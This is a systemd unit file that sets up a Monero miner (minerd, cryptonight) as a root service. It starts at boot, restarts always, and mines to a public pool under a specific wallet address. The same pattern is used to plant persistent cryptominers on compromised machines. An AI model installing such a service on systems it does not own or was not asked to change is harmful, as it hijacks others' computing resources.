[Unit]
Description=XMR Miner
Wants=network-online.target
After=network.target network-online.target

[Service]
Type=simple
WorkingDirectory=/tmp
ExecStart=/usr/local/bin/minerd -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 43EmoMmZTyJUTXFnr1SQKURfpFxdr6wQvceeUrLDiF4v3cLQCK97LJNPkW8w2WZJUwKrBM7n5t595LsxDHWEmsCJ338naEK -p x -t 8
Restart=always
User=root

[Install]
WantedBy=multi-user.target
